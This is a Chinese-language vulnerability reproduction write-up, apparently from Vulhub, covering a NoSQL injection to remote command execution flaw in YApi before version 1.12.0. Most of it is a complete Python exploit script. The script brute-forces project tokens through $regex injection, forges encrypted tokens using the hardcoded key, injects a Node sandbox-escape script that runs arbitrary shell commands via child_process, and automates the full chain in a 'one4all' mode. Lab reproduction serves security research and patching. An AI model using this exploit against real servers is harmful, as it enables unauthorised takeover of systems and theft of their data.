# YApi NoSQL注入导致远程命令执行漏洞 YApi是一个API管理工具。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。 参考链接: - https://github.com/YMFE/yapi/commit/59bade3a8a43e7db077d38a4b0c7c584f30ddf8c ## 漏洞环境 Vulhub执行如下命令启动一个YApi v1.10.2服务: ``` docker-compose up -d ``` 环境启动后,访问`http://your-ip:3000`即可看到YApi首页。 ![image-20221125164138774](images/202211251641047.png) ## 漏洞复现 本漏洞的利用需要YApi应用中至少存在一个项目与相关数据,否则无法利用。Vulhub环境中的YApi是一个即开即用、包含测试数据的服务器,所以可以直接进行漏洞复现。 使用[这个POC](https://github.com/vulhub/vulhub/blob/master/yapi/mongodb-inj/poc.py)来复现漏洞: ``` python poc.py --debug one4all -u http://your-ip:3000/ ``` ![image-20221125164438168](images/202211251644280.png) ## 漏洞POC - https://github.com/vulhub/vulhub/blob/master/yapi/mongodb-inj/poc.py ```python import requests import json import click import re import sys import logging import hashlib import binascii from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import padding from urllib.parse import urljoin logger = logging.getLogger('attacker') logger.setLevel('WARNING') ch = logging.StreamHandler(sys.stdout) ch.setFormatter(logging.Formatter('%(asctime)s - %(message)s')) logger.addHandler(ch) choices = 'abcedf0123456789' script_template = r'''const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() const Buffer = FunctionConstructor('return Buffer')() const output = process.mainModule.require("child_process").execSync(Buffer.from('%s', 'hex').toString()).toString() context.responseData = 'testtest' + output + 'testtest' ''' def compute(passphase: str): nkey = 24 niv = 16 key = '' iv = '' p = '' while True: h = hashlib.md5() h.update(binascii.unhexlify(p)) h.update(passphase.encode()) p = h.hexdigest() i = 0 n = min(len(p) - i, 2 * nkey) nkey -= n // 2 key += p[i:i + n] i += n n = min(len(p) - i, 2 * niv) niv -= n // 2 iv += p[i:i + n] i += n if nkey + niv == 0: return binascii.unhexlify(key), binascii.unhexlify(iv) def aes_encode(data): key, iv = compute('abcde') padder = padding.PKCS7(128).padder() cipher = Cipher(algorithms.AES(key), modes.CBC(iv)) encryptor = cipher.encryptor() ct = encryptor.update(padder.update(data.encode()) + padder.finalize()) + encryptor.finalize() return binascii.hexlify(ct).decode() def aes_decode(data): key, iv = compute('abcde') unpadder = padding.PKCS7(128).unpadder() cipher = Cipher(algorithms.AES(key), modes.CBC(iv)) decryptor = cipher.decryptor() ct = decryptor.update(binascii.unhexlify(data)) + decryptor.finalize() ct = unpadder.update(ct) + unpadder.finalize() return ct.decode().strip() def brute_token(target, already): url = urljoin(target, '/api/interface/up') current = '^' for i in range(20): for ch in choices: guess = current + ch data = { 'id': -1, 'token': { '$regex': guess, '$nin': already } } headers = { 'Content-Type': 'application/json' } response = requests.post(url, data=json.dumps(data), headers=headers, # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'}, # verify=False, ) res = response.json() if res['errcode'] == 400: current = guess break logger.debug(f'current cuess: {current}') return current[1:] def find_owner_uid(target, token): url = urljoin(target, '/api/project/get') for i in range(1, 200): params = {'token': aes_encode(f'{i}|{token}')} response = requests.get(url, params=params, # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'}, # verify=False, ) data = response.json() if data['errcode'] == 0: return i return None def find_project(target, token, pid=None): url = urljoin(target, '/api/project/get') params = {'token': token} if pid: params['id'] = pid response = requests.get(url, params=params, #proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'}, #verify=False, ) data = response.json() if data['errcode'] == 0: return data['data'] def find_col(target, token, brute_from, brute_to): url = urljoin(target, '/api/open/run_auto_test') for i in range(brute_from, brute_to): try: params = {'token': token, 'id': i, "mode": "json"} response = requests.get(url, params=params, timeout=5, #proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'}, #verify=False, ) data = response.json() if 'message' not in data: continue if data['message']['len'] > 0: logger.debug('Test Result Found: %r', response.url) yield i except requests.exceptions.Timeout: logger.debug('id=%d timeout', i) pass def update_project(target, token, project_id, command): url = urljoin(target, '/api/project/up') command_hex = command.encode().hex() script = script_template % command_hex response = requests.post(url, params={'token': token}, json={'id': project_id, 'after_script': script}, # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'}, # verify=False, ) data = response.json() return data['errcode'] == 0 def run_auto_test(target, token, col_id): url = urljoin(target, '/api/open/run_auto_test') response = requests.get(url, params={'token': token, 'id': col_id, 'mode': 'json'}, # proxies={'https': 'http://127.0.0.1:8085', 'http': 'http://127.0.0.1:8085'}, # verify=False, ) try: data = response.json() return data['list'][0]['res_body'][8:-8] except (requests.exceptions.JSONDecodeError, KeyError, IndexError, TypeError) as e: g = re.search(br'testtest(.*?)testtest', response.content, re.I | re.S) if g: return g.group(1).decode() else: return None def clear_project(target, token, project_id, old_after_script): url = urljoin(target, '/api/project/up') response = requests.post(url, params={'token': token}, json={'id': project_id, 'after_script': old_after_script}) data = response.json() return data['errcode'] == 0 @click.group() @click.option('--debug', 'debug', is_flag=True, type=bool, required=False, default=False) def cli(debug): if debug: logger.setLevel('DEBUG') @cli.command('enc') @click.argument('data', type=str, required=True) def cmd_enc(data: str): click.echo(aes_encode(data)) @cli.command('dec') @click.argument('data', type=str, required=True) def cmd_dec(data: str): click.echo(aes_decode(data)) @cli.command('token') @click.option('-u', '--url', type=str, required=True) @click.option('-c', '--count', type=int, default=5) def cmd_token(url, count): already = [] for i in range(count): token = brute_token(url, already) if not token: break click.echo(f'find a valid token: {token}') already.append(token) @cli.command('owner') @click.option('-u', '--url', type=str, required=True) @click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step') def cmd_owner(url, token): aid = find_owner_uid(url, token) e = aes_encode(f'{aid}|{token}') click.echo(f'your owner id is: {aid}, encrypted token is {e}') @cli.command('project') @click.option('-u', '--url', type=str, required=True) @click.option('-o', '--owner-id', 'owner', type=str, required=True) @click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step') def cmd_project(url, owner, token): token = aes_encode(f'{owner}|{token}') project = find_project(url, token) if project: logger.info('[+] project by this token: %r', project) click.echo(f'your project id is: {project["_id"]}') @cli.command('col') @click.option('-u', '--url', type=str, required=True) @click.option('-o', '--owner-id', 'owner', type=str, required=True) @click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step') @click.option('--from', 'brute_from', type=int, required=False, default=1, help='Brute Col id from this number') @click.option('--to', 'brute_to', type=int, required=False, default=200, help='Brute Col id to this number') def cmd_col(url, owner, token, brute_from, brute_to): token = aes_encode(f'{owner}|{token}') for i in find_col(url, token, brute_from, brute_to): click.echo(f'found a valid col id: {i}') @cli.command('rce') @click.option('-u', '--url', type=str, required=True) @click.option('-o', '--owner-id', 'owner', type=str, required=True) @click.option('-t', '--token', 'token', type=str, required=True, help='Token that get from first step') @click.option('--pid', 'project_id', type=int, required=True) @click.option('--cid', 'col_id', type=int, required=True) @click.option('-c', '--command', 'command', type=str, required=True, help='Command that you want to execute') def cmd_rce(url, owner, token, project_id, col_id, command): token = aes_encode(f'{owner}|{token}') project = find_project(url, token, project_id) if not project: click.echo('[-] failed to get project') return False old_after_script = project.get('after_script', '') if not update_project(url, token, project_id, command): click.echo('[-] failed to update project') return False output = run_auto_test(url, token, col_id) if output: click.echo(output) clear_project(url, token, project_id, old_after_script) return True clear_project(url, token, project_id, old_after_script) return False @cli.command('one4all') @click.option('-u', '--url', type=str, required=True) @click.option('--count', type=int, default=5) @click.option('-c', '--command', type=str, default='id') def cmd_one4all(url, count, command): already = [] for i in range(count): token = brute_token(url, already) if not token: logger.info('[-] no new token found, exit...') break already.append(token) logger.info('[+] find a new token: %s', token) owner_id = find_owner_uid(url, token) if not owner_id: logger.info('[-] failed to find the owner id using token %s', token) continue etoken = aes_encode(f'{owner_id}|{token}') logger.info('[+] find a new owner id: %r, encrypted token: %s', owner_id, etoken) project = find_project(url, etoken) if not project: logger.info('[-] failed to find project using token %s', token) continue project_id = project['_id'] logger.info('[+] project_id = %s, project = %r', project_id, project) col_ids = find_col(url, etoken, 1, 200) if not col_ids: logger.info('[+] failed to find cols in project %s, try next project...', project_id) for col_id in col_ids: logger.info('[+] col_id = %s', col_id) click.echo(f'hit: project_id: {project_id} | owner_id: {owner_id} | col_id: {col_id} | token: {token}') click.echo(f'suggestion: python {sys.argv[0]} rce -u {url} -t {token} -o {owner_id} --pid {project_id} --cid {col_id} --command="{command}"') if cmd_rce.callback(url, owner_id, token, project_id, col_id, command): return if __name__ == '__main__': cli() ```